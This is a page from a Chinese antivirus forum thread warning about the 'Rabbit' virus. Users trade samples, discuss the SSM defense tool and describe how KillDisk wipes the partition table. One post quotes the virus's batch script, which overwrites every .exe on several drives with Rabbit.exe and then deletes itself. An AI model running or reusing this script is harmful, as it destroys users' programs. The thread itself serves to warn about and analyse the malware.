瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】

12   2  /  2  页   跳转

警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】

引用:
【孤独更可靠的贴子】


猫叔给的样本运行了没反映..>_<

我什么都关了,监控.SSM.文件监控和注册表监控也都关了

还是不行.


5555


………………


那样本是“原汁原味儿”的。
俺没“阉割”它。
gototop
 

引用:
【horseluke11的贴子】

呵呵,猫叔能否发一个样本给我? horseluke#126.com(#改为@)

………………

发了
gototop
 

引用:
【天月来了的贴子】这个病毒现在的广为分析和讨论,为以后其他制毒者提供了更好的思路。

如果将熊猫到现在的流行的几个病毒的特点和兔兔合在一起。估计就差不多横扫网络了。

所有的用户,都没一个好下去场。

当然了,只有加了影子系统的,只上网玩的,才能幸免。

其他的要保存工作数据的,无法上影子系统的用户,就都得完蛋。


现在想,以后的主动防御,将成最主要的系统配置了。

但是还得不断推出新的主动防御软件。

现在的SSM已广为人知,它的主体文件大家都知道的清清楚楚。

我觉得SSM这类软件,在监控时,应该还是有漏洞的。

不知以后的病毒会怎样。


………………

没人敢说“影子”不会被病毒突破。事实上,木马KillDisk即可突破影子。
做光盘系统备份,经常备份非系统分区的重要数据到光盘上————是比较保险的办法之一。
gototop
 

引用:
【天月来了的贴子】木马KillDisk能突破影子,


不知在只有一个区。只有C盘的系统中,没有任何其他盘的系统中,能否干了影子呢?


猫猫试过吗?
………………

KillDisk并不留下任何木马文件。
运行后,调用系统模块,写引导扇区,破坏硬盘分区表。
下次开机,系统就死翘翘了。系统引导期间报错:Invalid Partition Table(分区表无效)。
gototop
 

引用:
【艾玛的贴子】C:\WINDOWS\system32\LOVETZ.bat

C:\WINDOWS\system32\TZ.bat

FOR  /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR  /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
del %0
FOR  %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf





update 2007.04.10
………………

这孩子,不知道什么叫“死”。
让他玩儿吧。
gototop
 

引用:
【新版小欧的贴子】猫叔,我现在关心的是,这回的更新,会不会像一些网友所说的:无视SSM?

现在不在公司,没能亲试,希望猫叔给回复.
………………

SSM会被这个兔仔子干掉的
gototop
 
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT